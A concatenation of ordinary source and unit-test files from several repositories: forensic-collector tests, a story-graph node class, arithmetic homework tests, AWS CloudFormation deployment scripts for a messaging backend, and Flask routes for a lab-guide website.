@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test___init__discover_parameter_false(self):
"""
Should not call _initialize_partitions.
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
init_mock = MagicMock(return_value=None)
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
with patch('source.ewfimage.EWFImage._initialize_partitions', init_mock):
EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
init_mock.assert_not_called()
class TestEWFImage(TestCase):
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test_filesysteminfo_discover_not_set(self):
"""
Should raise an error
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
from businesslogic.errors import CollectorParameterError
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
with self.assertRaises(CollectorParameterError):
ewf_image.filesysteminfo
class TestEWFPartitionFSObjectGetter(TestCase):
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
def test_fs_object(self):
"""Should raise LookupError if _fs_object is none"""
from source.ewfimage import EWFPartition
partition = EWFPartition(fs_object=None, partition={})
with self.assertRaises(LookupError):
partition.fs_object
```
#### File: mosk/tests/test_osinformation.py
```python
from unittest import TestCase, mock
from unittest.mock import MagicMock
from artefact.localhost.osinformation import OSName
class TestOSNameCollect(TestCase):
@mock.patch('artefact.localhost.osinformation.platform.system', MagicMock(return_value='Darwin'))
def test__collect(self):
"""
        Should return the macOS platform name for a known platform version.
:return:
"""
expected_platform_name = "Yosemite"
with mock.patch('artefact.localhost.osinformation.platform.mac_ver', MagicMock(return_value=['10.10'])):
collector = OSName(parent=None, parameters={})
collector._collect()
actual_platform_name = collector.data[0].collecteddata
self.assertEqual(expected_platform_name, actual_platform_name)
@mock.patch('artefact.localhost.osinformation.platform.system', MagicMock(return_value='Darwin'))
def test__collect_platform_is_bigsur(self):
"""
        Should always return BigSur for all possible revisions of it.
:return:
"""
expected_platform_name = "BigSur"
with mock.patch('artefact.localhost.osinformation.platform.mac_ver', MagicMock(return_value=['11.2.3'])):
collector = OSName(parent=None, parameters={})
collector._collect()
actual_platform_name = collector.data[0].collecteddata
self.assertEqual(expected_platform_name, actual_platform_name)
@mock.patch('artefact.localhost.osinformation.platform.system', MagicMock(return_value='Darwin'))
def test__collect_platform_is_monterey(self):
"""
        Should always return Monterey for all possible revisions of it.
:return:
"""
expected_platform_name = "Monterey"
with mock.patch('artefact.localhost.osinformation.platform.mac_ver', MagicMock(return_value=['12'])):
collector = OSName(parent=None, parameters={})
collector._collect()
actual_platform_name = collector.data[0].collecteddata
self.assertEqual(expected_platform_name, actual_platform_name)
@mock.patch('artefact.localhost.osinformation.platform.system', MagicMock(return_value='Darwin'))
    def test__collect_unknown_platform(self):
        """
        Should collect a string saying that the platform name cannot be collected.
:return:
"""
expected_platform_name = "Cannot collect OS name for platform version '13'"
with mock.patch('artefact.localhost.osinformation.platform.mac_ver', MagicMock(return_value=['13'])):
collector = OSName(parent=None, parameters={})
collector._collect()
actual_platform_name = collector.data[0].collecteddata
self.assertEqual(expected_platform_name, actual_platform_name)
@mock.patch('artefact.localhost.osinformation.platform.system', MagicMock(return_value='Darwin'))
    def test__collect_version_string_unknown_format(self):
        """
        Should collect a string reporting the unexpected version string format.
:return:
"""
expected_platform_name = "Cannot collect OS name. Unexpected version string format '1.1.1'."
with mock.patch('artefact.localhost.osinformation.platform.mac_ver', MagicMock(return_value=['1.1.1'])):
collector = OSName(parent=None, parameters={})
collector._collect()
actual_platform_name = collector.data[0].collecteddata
self.assertEqual(expected_platform_name, actual_platform_name)
class TestOSNameSupportedSystem(TestCase):
def test__supportedsystem(self):
"""
Should be "Darwin"
:return:
"""
from artefact.localhost.osinformation import OSName
collector = OSName(parameters={}, parent={})
self.assertEqual("['Darwin']", str(collector.supported_platform))
class TestOSVersionSupportedSystem(TestCase):
def test__supportedsystem(self):
"""
Should be "Darwin".
:return:
"""
from artefact.localhost.osinformation import OSVersion
collector = OSVersion(parameters={}, parent={})
self.assertEqual("['Darwin']", str(collector.supported_platform))
``` |
{
"source": "3phase/ombudsman-website",
"score": 3
} |
#### File: ombudsman-website/story_generator/Node.py
```python
class Node:
def __init__(self, id, text):
self.id = id
self.text = text
self.nexts = []
self.edges = []
def setText(self, text):
self.text = text
def setId(self, id):
        self.id = id
def getText(self):
return self.text
def getId(self):
return self.id
``` |
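The class above is a plain node for an adjacency-list story graph. A minimal usage sketch (the node ids and text below are hypothetical, not taken from the repository):

```python
# Minimal sketch: wiring two hypothetical story nodes together.
start = Node(id=1, text="You arrive at the ombudsman's office.")
hallway = Node(id=2, text="A long hallway stretches ahead.")

start.nexts.append(hallway)        # successor node
start.edges.append("go forward")   # label for the transition to it

print(start.getText())             # -> You arrive at the ombudsman's office.
print(start.nexts[0].getId())      # -> 2
```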
{
"source": "3pidemix/z09_homework1",
"score": 3
} |
#### File: z09_homework1/test/test_addition.py
```python
import unittest
from code.addition import add
from code.increment import inc
class TestAddition(unittest.TestCase):
def test_addition(self):
self.assertEqual(add(2, 4), 6)
def test_addition_neg(self):
self.assertNotEqual(add(82, -42), 16)
```
#### File: z09_homework1/test/test_multiplication.py
```python
import unittest
from code.multiplication import multiplication
class TestMultiplication(unittest.TestCase):
def test_multiplication(self):
self.assertEqual(multiplication(2, 4), 8)
def test_multiplication_neg(self):
self.assertNotEqual(multiplication(2, 5), 11)
``` |
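The `code.addition`, `code.increment`, and `code.multiplication` modules exercised above are not part of this snippet; a minimal sketch consistent with the assertions (implementations assumed, not taken from the repository) would be:

```python
# code/addition.py -- assumed implementation; satisfies add(2, 4) == 6
def add(a, b):
    return a + b

# code/increment.py -- imported by the test module but not asserted on here
def inc(x):
    return x + 1

# code/multiplication.py -- assumed implementation; satisfies multiplication(2, 4) == 8
def multiplication(a, b):
    return a * b
```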
{
"source": "3pillarlabs/hip-edit",
"score": 3
} |
#### File: hip-edit-infra/hip_edit/build_context.py
```python
import os
import yaml
class BuildContext(object):
"""
Collectible context for build and deployment steps.
"""
def __init__(self, file_path='.build_context.yml'):
self.file_path = file_path
self._build_data = None
self._lambda_vars = [
'npm_config_messaging_host',
'npm_config_messaging_password',
'npm_config_auth_agent_passcode'
]
def __str__(self):
return self.__repr__()
def __repr__(self):
return self._build_data.__repr__()
def lambda_vars(self):
"""
List of known variables.
"""
return self._lambda_vars
def get(self, name, group_key=None):
"""
Value if name is known, None otherwise.
"""
value = None
ctx = self._context()
if name == 'npm_config_messaging_host':
value = ctx['services']['MessageServerHost']
elif name == 'ApiUrl':
value = ctx['sam']['ApiUrl']
elif group_key is not None:
if isinstance(group_key, str):
value = ctx[group_key].get(name)
elif isinstance(group_key, (list, tuple)):
for k in group_key:
ctx = ctx[k]
value = ctx[name]
else:
value = ctx.get('sam', {}).get(name) or ctx.get('services', {}).get(name)
return value
def _context(self):
if self._build_data is None:
if os.path.exists(self.file_path):
self._build_data = yaml.load(file(self.file_path, 'r'))
else:
self._build_data = {}
return self._build_data
def add(self, group_key, outputs):
"""
Adds each output to the internal context, keyed by the group key
"""
ctx = self._context()
if isinstance(group_key, (list, tuple)):
for k in group_key:
if k not in ctx:
ctx[k] = {}
ctx = ctx[k]
else:
            if group_key not in ctx:
ctx[group_key] = {}
ctx = ctx[group_key]
for output_dict in outputs:
if isinstance(output_dict, dict):
name = output_dict['OutputKey']
value = output_dict['OutputValue']
elif isinstance(output_dict, tuple):
name = output_dict[0]
value = output_dict[1]
ctx[name] = value
return self
def save(self):
"""
Saves the internal context to file
"""
yaml.dump(self._context(), stream=file(self.file_path, 'w'), default_flow_style=False)
return self
```
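A short usage sketch of BuildContext (the file path and output value are hypothetical; note the class targets Python 2, since _context() and save() rely on the file() builtin):

```python
# Hypothetical round trip: record a CloudFormation output, then read it back.
ctx = BuildContext(file_path='/tmp/.build_context.yml')
ctx.add('services', [
    {'OutputKey': 'MessageServerHost', 'OutputValue': '192.0.2.10'},
])

# 'npm_config_messaging_host' is resolved from services/MessageServerHost.
assert ctx.get('npm_config_messaging_host') == '192.0.2.10'

# ctx.save() would persist the context to /tmp/.build_context.yml.
```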
#### File: hip-edit-infra/hip_edit/cf_template_builder.py
```python
from troposphere import Template, Parameter
from hip_edit import log, resource_title
from hip_edit.resources import bucket
from hip_edit.resources import instance
from hip_edit.resources import vpc
LOGGER = log.get_stream_logger(__name__)
def build(cli_options, new_template=None):
"""
Constructs and returns the CF template.
"""
prefix = cli_options.name
template = new_template or Template(Description="Infrastructure for %s" % prefix)
_build_aws_cf_template(cli_options, template)
LOGGER.debug(template.to_yaml())
return template
def _build_aws_cf_template(cli_options, template):
"""
:param troposphere.Template template:
"""
prefix = cli_options.name
vpc_param = None
if cli_options.vpc_id:
vpc_param = Parameter(resource_title.vpc_title(prefix),
Type='AWS::EC2::VPC::Id',
Default=cli_options.vpc_id,
Description='VPC to use for the backing services')
template.add_parameter(vpc_param)
subnet_param = None
if cli_options.subnet_id:
subnet_param = Parameter(resource_title.subnet_title(prefix),
Type='AWS::EC2::Subnet::Id',
Default=cli_options.subnet_id,
Description='Subnet to use for the backing services')
template.add_parameter(subnet_param)
vpc_resource, subnet_resource, security_group_resource = vpc.build(prefix, template,
vpc_param=vpc_param,
subnet_param=subnet_param)
instance.build(prefix, template,
vpc=vpc_resource,
subnet=subnet_resource,
security_group=security_group_resource,
region_code=cli_options.region,
instance_type=cli_options.instance_type,
key_name=cli_options.key_name,
attach_eip=False if cli_options.stack_halt() else True
)
bucket.build(prefix, template, suffix=cli_options.domain_suffix)
# YAML format
# ---
# AWSTemplateFormatVersion: "version date"
#
# Description:
# String
#
# Metadata:
# template metadata
#
# Parameters:
# set of parameters
#
# Mappings:
# set of mappings
#
# Conditions:
# set of conditions
#
# Transform:
# set of transforms
#
# Resources:
# set of resources
#
# Outputs:
# set of outputs
#
```
#### File: hip-edit-infra/hip_edit/log.py
```python
import logging
def get_stream_logger(name, fmt=logging.BASIC_FORMAT):
"""
    Builds a stream logger that inherits the root logging level.
"""
formatter = logging.Formatter(fmt)
console_handler = logging.StreamHandler()
console_handler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.addHandler(console_handler)
return logger
```
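A minimal usage sketch of the helper above (the format string is hypothetical). Note it attaches a handler but sets no level, so the effective level comes from the root logger, which sam.py and services.py configure at startup:

```python
# Hypothetical caller; messages are filtered at the root logger's level.
logger = get_stream_logger(__name__, fmt='%(asctime)s %(levelname)s %(name)s: %(message)s')
logger.info("stack update still in progress")
```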
#### File: hip_edit/resources/bucket.py
```python
from troposphere import GetAtt, Output
from troposphere.s3 import Bucket, PublicRead, WebsiteConfiguration
from hip_edit import resource_title
def build(prefix, template, suffix=None):
"""
    Adds the S3 website bucket and its WebsiteURL output to the CF template.
"""
s3bucket = template.add_resource(Bucket(
"%sS3Bucket" % prefix,
AccessControl=PublicRead,
WebsiteConfiguration=WebsiteConfiguration(
IndexDocument="index.html"
),
BucketName=resource_title.bucket_name(prefix, suffix)
))
template.add_output([
Output(
"WebsiteURL",
Value=GetAtt(s3bucket, "WebsiteURL"),
Description="URL for website hosted on S3"
)
])
```
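A minimal sketch of using this builder (the prefix and domain suffix are hypothetical):

```python
from troposphere import Template

from hip_edit.resources import bucket

template = Template()
bucket.build("HipEdit", template, suffix="example.com")
# Adds a bucket resource titled 'HipEditS3Bucket' named
# 'hip-edit-app.example.com', plus a 'WebsiteURL' output.
print(template.to_yaml())
```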
#### File: hip-edit-infra/hip_edit/resource_title.py
```python
import os
import re
VPC_GATEWAY_ATTACHMENT = "VPCGatewayAttachment"
def vpc_gateway_title(prefix):
"""
The VPC gateway title.
"""
return "%s%s" % (prefix, VPC_GATEWAY_ATTACHMENT)
def vpc_title(prefix):
"""
VPC title
"""
return "%sVPC" % prefix
def bucket_name(prefix, suffix=None):
"""
DNS compliant bucket name.
"""
if suffix:
fmt_str, fmt_args = ("%sApp.%s", (prefix, suffix))
else:
fmt_str, fmt_args = ("%sApp", prefix)
return "-".join([cp.lower() for cp in re.sub("([A-Z])", " \\1", fmt_str % fmt_args).split()])
def packaged_path(template_path, token='packaged'):
"""
Converts a path like ../foo/bar/template.yml to ../foo/bar/template-packaged.yml
"""
dn = os.path.dirname(template_path)
bn = os.path.basename(template_path)
    fn, ext = re.split(r'\.', bn)
fp = os.path.join(dn, fn)
return "{0}-{1}.{2}".format(fp, token, ext)
def subnet_title(prefix, index=1):
"""Subnet title"""
return "%sPublicSubnet%d" % (prefix, index)
```
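A few worked examples of the helpers above, derived by tracing the code (the prefix and paths are hypothetical):

```python
# bucket_name() splits the camel-cased prefix and lowercases it into a
# DNS-compliant name.
bucket_name("HipEdit")                    # -> 'hip-edit-app'
bucket_name("HipEdit", "example.com")     # -> 'hip-edit-app.example.com'

# packaged_path() injects a token before the file extension.
packaged_path("../foo/bar/template.yml")  # -> '../foo/bar/template-packaged.yml'

# subnet_title() simply appends an indexed suffix.
subnet_title("HipEdit")                   # -> 'HipEditPublicSubnet1'
```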
#### File: hip-edit/hip-edit-infra/sam.py
```python
from __future__ import print_function
import logging
from hip_edit import cli_arg_parser
from hip_edit import sam_deployer
from hip_edit.build_context import BuildContext
def main():
"""
Entry point.
"""
cli_options = cli_arg_parser.sam_arg_parser().parse_args()
logging.root.setLevel(logging.DEBUG if cli_options.verbose else logging.INFO)
build_context = BuildContext()
outputs = sam_deployer.main(cli_options, build_context)
if outputs is not None:
build_context.add('sam', outputs).save()
if __name__ == '__main__':
main()
```
#### File: hip-edit/hip-edit-infra/services.py
```python
from __future__ import print_function
import logging
from os import path
from hip_edit import activemq
from hip_edit import cli_arg_parser
from hip_edit import cf_template_builder
from hip_edit import cf_driver
from hip_edit import log
from hip_edit.build_context import BuildContext
LOGGER = log.get_stream_logger(__name__)
def main():
"""
Entry point
"""
cli_options = cli_arg_parser.services_arg_parser().parse_args()
logging.root.setLevel(logging.DEBUG if cli_options.verbose else logging.INFO)
if not cli_options.stack_down():
if cli_options.stack_halt():
if confirm("""You are going to stop the ActveMQ instance and release the EIP forever.
Is this what you want?""") != 'yes':
LOGGER.info('No changes made.')
return
template = cf_template_builder.build(cli_options)
else:
if confirm("""You are going to destroy all stack resources and
            this operation cannot be undone. Is this what you want?""") != 'yes':
LOGGER.info('No changes made.')
return
template = None
outputs = cf_driver.execute(cli_options, template)
if outputs is None or cli_options.stack_down():
return
build_ctx = BuildContext()
build_ctx.add('services', outputs).save()
activemq_instance_id = build_ctx.get('MessageServerInstanceId', group_key='services')
if cli_options.stack_up():
activemq.check_instance_status(instance_id=activemq_instance_id)
hostname = build_ctx.get('npm_config_messaging_host')
outputs = activemq.configure(cli_options, hostname,
templates_path=path.abspath('./artifacts/activemq'),
distribution_type='bitnami')
build_ctx.add(('services', 'activemq', 'users'), outputs).save()
else:
activemq.halt_instance(instance_id=activemq_instance_id)
def confirm(message, prompt=' ([no]/yes) '):
"""Prints a message and returns user input."""
print("\n".join((s.strip() for s in message.split("\n"))), end='')
return raw_input(prompt)
if __name__ == '__main__':
main()
```
#### File: tests/hip_edit/build_context_test.py
```python
from os import path
import os
import tempfile
import unittest
import yaml
from hip_edit.build_context import BuildContext
class BuildContextTests(unittest.TestCase):
"""
Tests for build_context
"""
def setUp(self):
        self.file_obj = path.join(tempfile.gettempdir(), '.build_context.yml')
self.build_context = BuildContext(file_path=self.file_obj)
def test_get(self):
"""
Tests getting values
"""
context = dict(
sam=dict(
ApiUrl='https://f1.execute-api.us-east-1.amazonaws.com/ga/',
LambdaArn='arn:aws:lambda:us-east-1:123:function:q-f-R0R'
),
services=dict(
InternetGateway='igw-123',
MessageServerHost='192.168.3.11',
PublicRouteTable='rtb-123'
)
)
yaml.dump(context, stream=file(self.file_obj, 'w'), default_flow_style=False)
assert self.build_context.get('ApiUrl') == context['sam']['ApiUrl']
assert self.build_context.get('npm_config_messaging_host') == context['services']['MessageServerHost']
def test_add_cf_outputs(self):
"""
Tests addition of cloud formation outputs
"""
message_server_host = dict(
OutputKey='MessageServerHost',
OutputValue='192.168.3.11')
self.build_context.add('services', [message_server_host])
assert self.build_context.get('npm_config_messaging_host') == message_server_host['OutputValue']
def test_add_tuple_outputs(self):
"""
Tests addition of key-value tuples
"""
users = dict(john='cr<PASSWORD>', alice='<PASSWORD>')
self.build_context.add('services', users.items())
assert self.build_context.get('john') == users['john']
assert self.build_context.get('alice') == users['alice']
def test_add_get_group_key(self):
"""
Tests addition of key-value tuples with hierarchial group_key
"""
users = dict(john='cr4=y', alice='bcf45')
groups = dict(publishers=['john', 'alice'])
self.build_context.add(('services', 'activemq', 'users'), users.items())
self.build_context.add('activemq-groups', groups.items())
assert self.build_context.get('john', group_key=('services', 'activemq', 'users')) == users['john']
assert self.build_context.get('alice', group_key=('services', 'activemq', 'users')) == users['alice']
assert self.build_context.get('publishers', group_key='activemq-groups') == groups['publishers']
```
#### File: tests/hip_edit/cf_driver_test.py
```python
from __future__ import print_function
from collections import namedtuple
import unittest
import botocore
from mock import MagicMock
from hip_edit import cf_template_builder
from hip_edit import cf_driver
FIELD_NAMES = ['name', 'region', 'instance_type', 'key_name', 'domain_suffix', 'vpc_id', 'subnet_id',
'stack_halt']
CliOptions = namedtuple('CliOptions', FIELD_NAMES)
def _make_cli_options(name='Plop',
region='eu-west-1',
instance_type='t2.micro',
key_name='plop',
domain_suffix=None,
vpc_id=None,
subnet_id=None,
stack_halt=MagicMock(return_value=False)):
return CliOptions(
name=name,
region=region,
instance_type=instance_type,
key_name=key_name,
domain_suffix=domain_suffix,
vpc_id=vpc_id,
subnet_id=subnet_id,
stack_halt=stack_halt
)
class CfDriverTests(unittest.TestCase):
"""
cf_driver.py tests
"""
def setUp(self):
self.cli_options = _make_cli_options()
self.template = cf_template_builder.build(self.cli_options)
def test_valid_cf_template(self):
"""Tests if the generated CF template is valid."""
assert self.template is not None
def test_creation_success(self):
"""CF stack creation in success path."""
ite = iter([None, -2, -1, 0])
initial_state = {
'Stacks': [{
'StackId': 'MockStack-1',
'StackStatus': 'CREATE_IN_PROGRESS'
}]
}
def _describe_stacks(*_args, **_kwargs):
val = ite.next()
if val is None:
raise botocore.exceptions.ClientError({}, 'mock')
elif val == -1:
initial_state['Stacks'][0]['Outputs'] = [{
'Key': 'yada', 'Value': 'yada'
}]
elif val == 0:
initial_state['Stacks'][0]['StackStatus'] = 'CREATE_COMPLETE'
return initial_state
client = MagicMock()
client.describe_stacks = MagicMock(side_effect=_describe_stacks)
client.create_stack = MagicMock(return_value={'StackId': 'MockStack-1'})
cf_driver.update_or_create_cf_template(__name__, self.template, client=client, retry_seconds=0)
def test_creation_failure_with_rollback_success(self):
"""CF stack creation in rollback path."""
states_ite = iter([None, 'CREATE_IN_PROGRESS', 'CREATE_FAILED', 'ROLLBACK_IN_PROGRESS', 'ROLLBACK_COMPLETE'])
initial_state = {
'Stacks': [{'StackStatus': 'CREATE_IN_PROGRESS'}]
}
def _describe_stacks(*_args, **_kwargs):
cur_state = states_ite.next()
if cur_state is None:
raise botocore.exceptions.ClientError({}, 'mock')
else:
initial_state['Stacks'][0]['StackStatus'] = cur_state
return initial_state
client = MagicMock()
client.describe_stacks = MagicMock(side_effect=_describe_stacks)
client.create_stack = MagicMock(return_value={'StackId': 'MockStack-1'})
cf_driver.update_or_create_cf_template(__name__, self.template, client=client, retry_seconds=0)
def test_update_success(self):
"""CF stack update in success path."""
states_ite = iter(['UPDATE_IN_PROGRESS', 'UPDATE_COMPLETE_CLEANUP_IN_PROGRESS', 'UPDATE_COMPLETE'])
initial_state = {
'Stacks': [{
'StackId': 'MockStack-1',
'StackStatus': None
}]
}
def _describe_stacks(*_args, **_kwargs):
initial_state['Stacks'][0]['StackStatus'] = states_ite.next()
return initial_state
client = MagicMock()
client.describe_stacks = MagicMock(side_effect=_describe_stacks)
client.update_stack = MagicMock(return_value={'StackId': 'MockStack-1'})
cf_driver.update_or_create_cf_template(__name__, self.template, client=client, retry_seconds=0)
def test_stack_halt(self):
"""Should not attach the EIP"""
self.cli_options = _make_cli_options(stack_halt=MagicMock(return_value=True))
template = cf_template_builder.build(self.cli_options)
assert 'MessageServerHost' not in template.to_dict()['Outputs']
``` |
{
"source": "3pings/HOLCLD-2100",
"score": 2
} |
#### File: HOLCLD-2100/core/lab_data.py
```python
import yaml, os
def get_lab_data():
yaml_path = os.path.abspath(os.path.join(os.path.dirname( __file__ ), os.pardir, 'lab/yaml/lab_data.yaml'))
yaml_data = open(yaml_path, 'r')
return yaml.load(yaml_data, Loader=yaml.FullLoader)
```
#### File: HOLCLD-2100/core/routefunc.py
```python
import yaml
import os
def base_section_files():
"""
Each member of the list is a section. Inside is a dictionary that contains the information for the chapters.
These three separate sections are split in the template to separate columns to fit the many sections on the
menu as needed.
    You have two places for the URL indicator: the key of the dictionary entry and its weburl field,
    and these need to match. The dictionary is read from two separate places: one that just uses the
    dictionary reference, and a second that converts the dictionary to a list ordered by the numeric
    pos column.
"""
empty_menu = [
{
"head": {"line": "head", "step": 0, "pos": 1, "ls": True, "weburl": "head", "file": None, "title": "Introduction"},
"landing": {"line": "data", "step": 1, "pos": 2, "ls": True, "weburl": "landing", "file": "podlanding.html", "title": "Introduction"},
}
]
yaml_path = os.path.abspath(os.path.join(
os.path.dirname(__file__), os.pardir, 'lab/yaml/menu.yaml'))
if os.path.exists(yaml_path):
print("Menu YAML file exists. Processing")
yaml_data = open(yaml_path, 'r')
menu_dict = yaml.load(yaml_data, Loader=yaml.FullLoader)
else:
print("Menu !!NOT FOUND!!. Returning blank menu")
menu_dict = empty_menu
return menu_dict
def ordered_menu_list(data):
"""
:param data:
    This function takes the menu dictionary and returns a dictionary indexed by section, where each
    section contains a list sorted by the pos column. Without this, the menu would end up in a
    different order, since plain Python dictionaries have no guaranteed order. It is called when the
    menu data is passed to the template for processing; since we can't use the lambda sort inside
    the template, the data has to be passed to the template already ordered.
"""
ordered_submenu_list = {}
for menu_section in data:
for key in menu_section.keys():
ordered_submenu_list[key] = []
for menu_section in data:
sorted_menus = sorted(
[v for v in next(iter(menu_section.values())).values()], key=lambda x: x['pos'])
topkey = menu_section.popitem()[0]
ordered_submenu_list[topkey] = sorted_menus
return ordered_submenu_list
def ordered_section_list(data):
"""
:param data:
    This returns an ordered list of section names from the menu's list of dictionaries.
"""
ordered_section_list = []
for menu_section in data:
for key in menu_section.keys():
ordered_section_list.append(key)
return ordered_section_list
def unordered_menu_dictionary():
data = base_section_files()
unordered_dictionary = {}
for menu_section in data:
for topkey, value in menu_section.items():
unordered_dictionary[topkey] = value
return unordered_dictionary
def create_lab_ui_steps(data, current_section):
"""
:param data:
:param current_section:
    This function creates an HTML string of Cisco UI step elements to give the
    user a sense of where they are in the lab.
"""
html = "<div class='progress_step'>"
#html += "<div class='step_title'>LAB PROGRESS</div>"
html += "<div class='ui-steps step-list'>"
count = 1
list_of_sections = []
for section in data:
for key, dict in section.items():
list_of_sections.append(key)
current_list_position = list_of_sections.index(current_section)
for section in data:
for key, section_dict in section.items():
if section_dict["head"]["ls"]:
if key == current_section:
html += "<div class='ui-step active'>"
else:
position_in_list = list_of_sections.index(key)
if position_in_list < current_list_position:
html += "<div class='ui-step visited'>"
else:
html += "<div class='ui-step'>"
html += "<div class='step__icon'>" + str(count) + "</div>"
html += "<div class='step__label'>" + \
section_dict["head"]["title"] + "</div>"
html += "</div>"
count += 1
html += "</div></div>"
return html
def create_footer_urls():
"""
This function will read the YAML file called footer_links.yaml in the
lab section and create the HTML links at the bottom bar from that data.
"""
yaml_path = os.path.abspath(os.path.join(os.path.dirname(
__file__), os.pardir, 'lab/yaml/footer_links.yaml'))
if os.path.exists(yaml_path):
print("The footers yaml file exists, procesing")
yaml_data = open(yaml_path, 'r')
list_of_urls = yaml.load(yaml_data, Loader=yaml.FullLoader)
else:
list_of_urls = []
return list_of_urls
def ordered_page_list(data):
"""
    This function takes the menu items and returns a list of them in sequential order based on the pos value. This
    is used to create the "next" and "previous" steps at the bottom of the page so the user can go back and
forth across the sections without the menu.
"""
mylist = []
newlist = {}
# the menu is a list of dictionaries in order. loop to extract the section dicts.
# note the title defined in lab/yaml/menu.yaml will be stripped to first 30 characters
for menudict in data:
for menukey, menudata in menudict.items():
for menuitem_key, menuitem_entry in menudata.items():
if menuitem_entry["line"] == "data":
newlist["exists"] = True
newlist["pos"] = menuitem_entry["pos"]
newlist["file"] = menuitem_entry["file"]
newlist["title"] = menuitem_entry["title"][:30]
newlist["weburl"] = menuitem_entry["weburl"]
newlist["section"] = menukey
mylist.append(newlist)
newlist = {}
ordered_list = sorted(mylist, key=lambda k: k['pos'])
return ordered_list
def get_page_position_data(page):
"""
:param page:
    Returns a list containing the previous, current, and next page positions in the document,
    derived from the ordered page list for the given page.
"""
all_pages = ordered_page_list(base_section_files())
pageindex = page_find_numericindex(all_pages, page)
page_position_data = []
prev_page = page_index_info(pageindex - 1, all_pages)
current_page = page_index_info(pageindex, all_pages)
next_page = page_index_info(pageindex + 1, all_pages)
if prev_page["pos"] < current_page["pos"]:
page_position_data.append(prev_page)
else:
page_position_data.append({"exists": False})
page_position_data.append(current_page)
if next_page is not False:
if next_page["pos"] > current_page["pos"]:
page_position_data.append(next_page)
else:
page_position_data.append({"exists": False})
else:
page_position_data.append({"exists": False})
return page_position_data
def page_index_info(pageindex, all_pages):
try:
page_info = all_pages[pageindex]
except Exception:
return False
return page_info
def page_find_numericindex(all_pages, page):
for i, dic in enumerate(all_pages):
if dic['pos'] == page:
# print "this page is pos=" + str(dic['pos']) + " and index on the list of: " + str(i)
return i
return -1
def podlist():
yaml_path = os.path.abspath(os.path.join(os.path.dirname(
__file__), os.pardir, 'lab/yaml/pod_list.yaml'))
yaml_data = open(yaml_path, 'r')
return yaml.load(yaml_data, Loader=yaml.FullLoader)
def extract_parsed_commands(section, chapter):
    from bs4 import BeautifulSoup
dict_menu = unordered_menu_dictionary()
path_to_file = os.path.abspath(os.path.join(
os.path.dirname(__file__), os.pardir, 'lab/templates/' + dict_menu[section][chapter]["file"]))
f = open(path_to_file)
contents = f.read()
htmlstring = "<pre>"
soup = BeautifulSoup(contents, features="html.parser")
for tag in soup.find_all("code"):
htmlstring += tag.get_text()
htmlstring += "</pre>"
return htmlstring
```
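For reference, a minimal menu structure accepted by ordered_menu_list() and create_lab_ui_steps() above (section and chapter names hypothetical): a list of single-key section dicts whose entries carry a numeric pos used for ordering. Note that ordered_menu_list() pops the section key from its input as it runs.

```python
sample_menu = [
    {"intro": {
        "head":    {"line": "head", "step": 0, "pos": 1, "ls": True,
                    "weburl": "head", "file": None, "title": "Introduction"},
        "landing": {"line": "data", "step": 1, "pos": 2, "ls": True,
                    "weburl": "landing", "file": "podlanding.html",
                    "title": "Introduction"},
    }},
]

# ordered_menu_list(sample_menu)  -> {'intro': [<head entry>, <landing entry>]}
# ordered_page_list(sample_menu)  -> [<landing entry>]   (only 'data' lines)
```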
#### File: HOLCLD-2100/lab/lab_routes.py
```python
import os, sys, uuid
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from flask import Blueprint, render_template, send_file, render_template_string
from core.routefunc import podlist, ordered_menu_list, base_section_files, create_lab_ui_steps, unordered_menu_dictionary
from core.routefunc import ordered_section_list, get_page_position_data, create_footer_urls
from core.lab_data import get_lab_data
from core.print_doc import create_whole_doc
from lab.pod_data import get_pod_data
from core.imgman import txtimage
lab = Blueprint('lab',__name__, template_folder='templates', static_folder='static')
@lab.route('/pod<int:pod_id>/<section>/<chapter>', methods=['GET', 'POST'])
@lab.route('/pod<int:pod_id>', methods=['GET', 'POST'])
def route2section(pod_id, section="intro", chapter="landing"):
anchor = ""
section_info = unordered_menu_dictionary()
page_number = section_info[section][chapter]['pos']
return render_template(section_info[section][chapter]['file'],
pod=str(pod_id),
podlist=podlist(),
data=get_pod_data(pod_id),
lab_data=get_lab_data(),
footer_urls=create_footer_urls(),
html_for_step_status=create_lab_ui_steps(base_section_files(),section),
section=section,
chapter=chapter,
anchor=anchor,
title=section_info[section][chapter]['title'],
menu=ordered_menu_list(base_section_files()),
unordered_menu=unordered_menu_dictionary(),
ordered_section_list=ordered_section_list(base_section_files()),
page_position=get_page_position_data(page_number),
cache_kill=uuid.uuid4()
)
@lab.route('/imgman/pod/<int:pod_id>/id/<int:imgman_id>')
def img_man(imgman_id, pod_id):
    # This takes the URL parameters and passes them to the image processor, which reads the CSV file
    # and returns the binary image that is passed to the browser IMG tag.
return send_file(txtimage(imgman_id, pod_id), mimetype='image/PNG')
@lab.route('/pod<int:pod_id>/print')
def print_doc(pod_id):
data=get_pod_data(pod_id)
return render_template_string(create_whole_doc(pod_id),
title='LTRACI-2967: ',
pod=str(pod_id),
page_position=get_page_position_data(1),
data=data)
``` |
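A minimal sketch of wiring the blueprint above into an application (module layout assumed from the imports):

```python
from flask import Flask

from lab.lab_routes import lab

app = Flask(__name__)
app.register_blueprint(lab)

# e.g. GET /pod1 renders the landing chapter, GET /pod1/<section>/<chapter>
# renders a specific page, and GET /pod1/print renders the whole document.
```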